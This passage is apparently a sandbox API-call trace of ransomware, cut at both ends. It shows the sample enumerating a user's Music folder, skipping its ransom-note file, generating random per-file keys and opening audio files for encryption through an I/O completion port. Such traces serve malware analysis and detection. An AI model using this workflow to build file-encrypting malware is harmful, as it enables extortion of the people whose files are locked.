nFileSizeLow=0x15a0b, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="c2-KpQ.m4a", cAlternateFileName="")) returned 1 [0167.719] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\c2-KpQ.m4a") returned 40 [0167.719] lstrcmpW (lpString1="c2-KpQ.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.719] PathFindExtensionW (pszPath="c2-KpQ.m4a") returned=".m4a" [0167.719] lstrlenW (lpString=".m4a") returned 4 [0167.719] PathFindExtensionW (pszPath="c2-KpQ.m4a") returned=".m4a" [0167.719] SystemFunction036 (in: RandomBuffer=0x4ebde04, 
RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0167.719] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\c2-KpQ.m4a" (normalized: "c:\\users\\5alr3u30d3\\music\\c2-kpq.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0167.720] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=88587) returned 1 [0167.720] GetProcessHeap () returned 0x270000 [0167.720] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.722] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="F8") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="26") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="2F") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="9B") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="72") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="D5") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="0A") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="41") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="AF") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="E1") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="DC") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="29") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="F0") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="67") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="73") 
returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="12") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="EB") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="68") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="84") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="A5") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="84") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="4D") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="43") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="F0") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="FD") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="F2") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="81") returned 2 [0167.722] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="95") returned 2 [0167.723] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="D0") returned 2 [0167.723] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="08") returned 2 [0167.723] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="FD") returned 2 [0167.723] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="38") returned 2 [0167.723] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\c2-KpQ.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\c2-KpQ.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\c2-KpQ.m4a" [0167.723] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.723] PostQueuedCompletionStatus 
(CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.725] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x599db420, ftCreationTime.dwHighDateTime=0x1d7e63d, ftLastAccessTime.dwLowDateTime=0xd0040d40, ftLastAccessTime.dwHighDateTime=0x1d7e669, ftLastWriteTime.dwLowDateTime=0xd0040d40, ftLastWriteTime.dwHighDateTime=0x1d7e669, nFileSizeHigh=0x0, nFileSizeLow=0x7e12, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="d0i80.mp3", cAlternateFileName="")) returned 1 [0167.731] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\d0i80.mp3") returned 39 [0167.731] lstrcmpW (lpString1="d0i80.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.731] PathFindExtensionW (pszPath="d0i80.mp3") returned=".mp3" [0167.731] lstrlenW (lpString=".mp3") returned 4 [0167.731] PathFindExtensionW (pszPath="d0i80.mp3") returned=".mp3" [0167.732] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0167.732] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\d0i80.mp3" (normalized: "c:\\users\\5alr3u30d3\\music\\d0i80.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0167.733] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=32274) returned 1 [0167.733] GetProcessHeap () returned 0x270000 [0167.733] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.734] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="81") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="A6") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd4a, 
param_2="%02X" | out: param_1="31") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="89") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="77") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="E7") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="86") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="A7") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="F0") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="72") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="57") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="07") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="01") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="40") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="C2") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="85") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="F4") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="EA") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="F5") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="06") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="3C") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="6F") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="6A") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="94") returned 2 [0167.734] wsprintfW 
(in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="0A") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="4C") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="EE") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="8C") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="67") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="1C") returned 2 [0167.734] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="BF") returned 2 [0167.735] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="5C") returned 2 [0167.735] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\d0i80.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\d0i80.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\d0i80.mp3" [0167.735] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.735] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.743] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b5a930, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0167.744] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\desktop.ini") returned 41 [0167.744] lstrcmpW (lpString1="desktop.ini", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.744] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0167.744] lstrlenW (lpString=".ini") returned 4 [0167.744] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0167.744] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8deafe0, ftCreationTime.dwHighDateTime=0x1d7dd48, ftLastAccessTime.dwLowDateTime=0x825c8f90, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0x825c8f90, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x5c84, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="EDgkOwoCzVQ1piLO.wav", cAlternateFileName="EDGKOW~1.WAV")) returned 1 [0167.744] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\EDgkOwoCzVQ1piLO.wav") returned 50 [0167.744] lstrcmpW (lpString1="EDgkOwoCzVQ1piLO.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.744] PathFindExtensionW (pszPath="EDgkOwoCzVQ1piLO.wav") returned=".wav" [0167.744] lstrlenW (lpString=".wav") returned 4 [0167.744] PathFindExtensionW (pszPath="EDgkOwoCzVQ1piLO.wav") returned=".wav" [0167.744] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0167.744] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\EDgkOwoCzVQ1piLO.wav" (normalized: "c:\\users\\5alr3u30d3\\music\\edgkowoczvq1pilo.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0167.745] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=23684) returned 1 [0167.745] GetProcessHeap () returned 0x270000 [0167.745] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.745] wsprintfW 
(in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="BF") returned 2 [0167.745] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="10") returned 2 [0167.745] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="2A") returned 2 [0167.745] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="9C") returned 2 [0167.745] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="A6") returned 2 [0167.745] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="44") returned 2 [0167.745] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="CC") returned 2 [0167.745] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="DE") returned 2 [0167.745] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="F8") returned 2 [0167.745] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="2A") returned 2 [0167.745] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="95") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="0B") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="1B") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="3D") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="A9") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="20") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="71") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="C3") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="D4") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="A1") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="00") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="4D") 
returned 2 [0167.746] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="F9") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="D9") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="0C") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="2C") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="1E") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="8A") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="D4") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="82") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="28") returned 2 [0167.746] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="26") returned 2 [0167.747] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\EDgkOwoCzVQ1piLO.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\EDgkOwoCzVQ1piLO.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\EDgkOwoCzVQ1piLO.wav" [0167.747] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.747] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.750] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd97c0010, ftCreationTime.dwHighDateTime=0x1d7dba8, ftLastAccessTime.dwLowDateTime=0x6b8bc430, ftLastAccessTime.dwHighDateTime=0x1d7e582, ftLastWriteTime.dwLowDateTime=0x6b8bc430, ftLastWriteTime.dwHighDateTime=0x1d7e582, nFileSizeHigh=0x0, nFileSizeLow=0x18a85, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="HVm1M33x_lC.wav", 
cAlternateFileName="HVM1M3~1.WAV")) returned 1 [0167.754] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\HVm1M33x_lC.wav") returned 45 [0167.754] lstrcmpW (lpString1="HVm1M33x_lC.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.754] PathFindExtensionW (pszPath="HVm1M33x_lC.wav") returned=".wav" [0167.754] lstrlenW (lpString=".wav") returned 4 [0167.754] PathFindExtensionW (pszPath="HVm1M33x_lC.wav") returned=".wav" [0167.754] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0167.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\HVm1M33x_lC.wav" (normalized: "c:\\users\\5alr3u30d3\\music\\hvm1m33x_lc.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0167.754] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=100997) returned 1 [0167.754] GetProcessHeap () returned 0x270000 [0167.754] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.755] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="60") returned 2 [0167.755] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="9D") returned 2 [0167.755] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="2D") returned 2 [0167.755] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="AA") returned 2 [0167.755] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="52") returned 2 [0167.755] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="4E") returned 2 [0167.755] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="5B") returned 2 [0167.755] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="55") returned 2 [0167.755] wsprintfW (in: param_1=0x4ebdd62, 
param_2="%02X" | out: param_1="D1") returned 2 [0167.755] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="98") returned 2 [0167.755] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="F8") returned 2 [0167.755] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="A5") returned 2 [0167.755] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="09") returned 2 [0167.755] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="6B") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="AA") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="D7") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="8B") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="0C") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="E8") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="9B") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="07") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="CF") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="1E") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="2C") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="17") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="04") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="C3") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="07") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="85") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="1A") returned 2 [0167.756] wsprintfW 
(in: param_1=0x4ebddba, param_2="%02X" | out: param_1="AE") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="23") returned 2 [0167.757] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\HVm1M33x_lC.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\HVm1M33x_lC.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\HVm1M33x_lC.wav" [0167.757] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.757] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.760] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a4fdbc0, ftCreationTime.dwHighDateTime=0x1d7e416, ftLastAccessTime.dwLowDateTime=0xe3aff470, ftLastAccessTime.dwHighDateTime=0x1d7e4b2, ftLastWriteTime.dwLowDateTime=0xe3aff470, ftLastWriteTime.dwHighDateTime=0x1d7e4b2, nFileSizeHigh=0x0, nFileSizeLow=0xadca, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="PpOtp7J97-dM4YBP.wav", cAlternateFileName="PPOTP7~1.WAV")) returned 1 [0167.760] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\PpOtp7J97-dM4YBP.wav") returned 50 [0167.760] lstrcmpW (lpString1="PpOtp7J97-dM4YBP.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.760] PathFindExtensionW (pszPath="PpOtp7J97-dM4YBP.wav") returned=".wav" [0167.761] lstrlenW (lpString=".wav") returned 4 [0167.761] PathFindExtensionW (pszPath="PpOtp7J97-dM4YBP.wav") returned=".wav" [0167.761] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0167.761] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\PpOtp7J97-dM4YBP.wav" (normalized: 
"c:\\users\\5alr3u30d3\\music\\ppotp7j97-dm4ybp.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0167.764] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=44490) returned 1 [0167.764] GetProcessHeap () returned 0x270000 [0167.764] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.765] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="E5") returned 2 [0167.765] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="C9") returned 2 [0167.765] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="C3") returned 2 [0167.765] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="3F") returned 2 [0167.765] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="F4") returned 2 [0167.765] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="50") returned 2 [0167.765] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="FF") returned 2 [0167.765] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="2F") returned 2 [0167.765] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="4D") returned 2 [0167.765] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="F8") returned 2 [0167.765] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="2A") returned 2 [0167.765] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="3C") returned 2 [0167.765] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="F6") returned 2 [0167.765] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="75") returned 2 [0167.765] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="31") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="9D") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebdd82, 
param_2="%02X" | out: param_1="AE") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="9E") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="7B") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="4B") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="D5") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="98") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="26") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="B4") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="AB") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="F5") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="DC") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="71") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="6B") returned 2 [0167.766] 